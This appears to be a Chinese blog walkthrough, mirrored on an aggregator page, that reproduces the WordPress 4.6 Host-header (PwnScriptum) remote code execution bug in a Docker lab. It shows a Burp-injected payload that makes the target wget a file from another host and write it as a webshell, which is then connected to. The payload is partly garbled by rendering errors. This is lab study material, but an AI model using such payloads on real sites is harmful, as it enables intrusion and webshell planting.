码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 4.6版本Wordpress漏洞复现


    文章目录

    • 一、搭建环境
    • 二、漏洞复现
      • 1.抓包
      • 2.准备payload
      • 3.发送payload
      • 4.检查是否上传成功
      • 5.连接payload

    国外的:Wordpress,Drupal,Joomla,这是国外最流行的3大CMS。国内则是DedeCMS和帝国,PHPCMS等。
    国内的CMS会追求大而全,而国外的CMS更注重生态,更注重友好的接口,更多的功能留给第三方开发插件来实现。
    推荐几个比较新的:ProcessWire,OctoberCMS,CraftCMS

    一、搭建环境

    进入wordpress里的pwnscriptum里运行docker
    docker-compose up -d 拉取环境
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

    扫描一下wordpress的版本,只有4.6及以下的版本才有这个漏洞
    wpscan --url http://192.168.25.128:8080/
    在这里插入图片描述

    二、漏洞复现

    1.抓包

    点击忘记密码,输入刚才创建的用户名或者电子邮箱
    在这里插入图片描述

    开启burp抓包拦截
    在这里插入图片描述

    2.准备payload

    Host: aa(any -froot@localhost -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum…{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}var{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}www{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}html{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wutiangui.php{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}192.168.155.2:…{substr{0}{1}{$spool_directory}}payload.txt}} null)
    这句话的意思是从192.168.155.2 这个IP地址上下载文件payload.txt 到靶机上的var/www/html目录下的wutiangui.php文件里

    3.发送payload

    通过BP把一句话木马输入到靶机上,测试一下是否可以通过BP写入成功
    在这里插入图片描述

    4.检查是否上传成功

    在这里插入图片描述

    网页回显没报错,应该成功了
    执行后进入以下目录查看
    /var/lib/docker/overlay2/b0766f51462cbcb76c2f483c439ab74adce69f6b1f5325b69f67ef889ee3b21e/merged/var/www/html
    在这里插入图片描述

    可以发现生成wutiangui.php
    在这里插入图片描述

    5.连接payload

    用御剑连接成功
    在这里插入图片描述
    在这里插入图片描述

  • 相关阅读:
    es6语法import()的使用
    LeetCode(力扣)1005. K 次取反后最大化的数组和Python
    《向量数据库指南》——向量数据库的底层原理是什么?
    【录用案例】CCF-C类,1/2区SCI&EI,3个月14天录用,30天见刊,11天检索
    2024字节跳动校招面试真题汇总及其解答(四)
    书生浦语训练营第2期-第4节笔记
    asp毕业设计——基于C#+asp.net+sqlserver在线英语自学系统设计与实现(毕业论文+程序源码)——在线英语自学系统
    ubuntu下切换默认python版本
    西电_张子敬数字信号处理二_学习笔记
    《LeetCode力扣练习》代码随想录——链表(两两交换链表中的节点---Java)
  • 原文地址:https://blog.csdn.net/wutiangui/article/details/132776485
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号